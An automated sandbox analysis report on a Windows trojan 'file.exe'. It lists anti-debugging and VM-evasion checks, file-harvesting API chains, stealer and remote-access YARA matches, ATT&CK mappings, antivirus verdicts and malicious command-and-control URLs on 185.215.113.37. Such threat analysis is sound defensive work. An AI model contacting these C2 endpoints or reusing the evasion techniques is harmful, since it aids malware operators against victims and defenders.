                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DDCE3 second address: 5DDCE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DDCE8 second address: 5DDCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jg 00007F2AF93CAAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DE820 second address: 5DE824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DE824 second address: 5DE833 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F2AF93CAAB6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DE833 second address: 5DE83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DE83A second address: 5DE855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2AF93CAAC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DE855 second address: 5DE85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5545 second address: 4F5557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5557 second address: 4F555D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F555D second address: 4F5562 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3C7D second address: 5E3C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E64C3 second address: 5E64EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AF93CAAC4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E64EB second address: 5E6513 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AF86F4EACh 0x00000008 jne 00007F2AF86F4E96h 0x0000000e jmp 00007F2AF86F4EA0h 0x00000013 jc 00007F2AF86F4E9Eh 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC9BE second address: 5EC9E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2AF93CAACAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC9E2 second address: 5EC9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF13F second address: 5EF144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF144 second address: 5EF14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60262A second address: 602631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602631 second address: 60264B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jo 00007F2AF86F4E96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 603E32 second address: 603E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 603E38 second address: 603E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F2AF86F4E96h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60726F second address: 607273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 607273 second address: 607279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 607279 second address: 60727E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6073BA second address: 6073BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6073BE second address: 6073C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6073C4 second address: 6073DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F2AF86F4E96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6073DC second address: 60740A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F2AF93CAAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2AF93CAAC5h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 jng 00007F2AF93CAAB6h 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616D63 second address: 616D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6176C2 second address: 6176C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6176C9 second address: 6176E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AF86F4E98h 0x00000008 pushad 0x00000009 jmp 00007F2AF86F4E9Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 617821 second address: 617855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2AF93CAAC2h 0x0000000e jbe 00007F2AF93CAAB6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6179C5 second address: 6179D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2AF86F4E9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61AD1B second address: 61AD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAABFh 0x00000009 popad 0x0000000a jmp 00007F2AF93CAAC8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F2AF93CAABEh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007F2AF93CAAB8h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C1CF second address: 61C1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C1D3 second address: 61C209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC1h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F2AF93CAAC5h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C209 second address: 61C20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C20D second address: 61C22A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C22A second address: 61C241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F2AF86F4E9Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C241 second address: 61C245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C245 second address: 61C254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jne 00007F2AF86F4E96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61DFDD second address: 61E004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jmp 00007F2AF93CAAC3h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2AF93CAABAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61FABE second address: 61FAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0022B second address: 4D00246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00246 second address: 4D0025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0025E second address: 4D002C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, dx 0x0000000d pushfd 0x0000000e jmp 00007F2AF93CAAC9h 0x00000013 sbb ax, A676h 0x00000018 jmp 00007F2AF93CAAC1h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007F2AF93CAABEh 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2AF93CAAC7h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D002C7 second address: 4D002DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00358 second address: 4D003C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2AF93CAAC0h 0x00000009 or ax, 8F78h 0x0000000e jmp 00007F2AF93CAABBh 0x00000013 popfd 0x00000014 jmp 00007F2AF93CAAC8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov di, 0B84h 0x00000022 pushfd 0x00000023 jmp 00007F2AF93CAABDh 0x00000028 and al, FFFFFFC6h 0x0000002b jmp 00007F2AF93CAAC1h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D003C9 second address: 4D003DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3818B9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3818DF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 553C45 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00121160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2284650077.0000000000F68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4
                Source: file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2284650077.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2284650077.0000000000F33000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13334
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13331
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13385
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13345
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13353
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001245C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00139750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: file.exe PID: 2836, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PProgram Manager
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00137B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00136920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00137A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match File source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 2836, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match File source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 2836, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (one column per tactic; a number in front of a technique is the count of signatures that matched it for this sample)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 47% | ReversingLabs | Win32.Trojan.Generic |
                file.exe | 56% | Virustotal | | Browse
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                http://185.215.113.37/ws | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.phpO | 17% | Virustotal | | Browse
                http://185.215.113.37/e2b1563c6670f193.phpg | 17% | Virustotal | | Browse
                http://185.215.113.37/e2b1563c6670f193.phpS | 17% | Virustotal | | Browse
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpLMEM | file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpO | file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/rn | file.exe, 00000000.00000002.2284650077.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
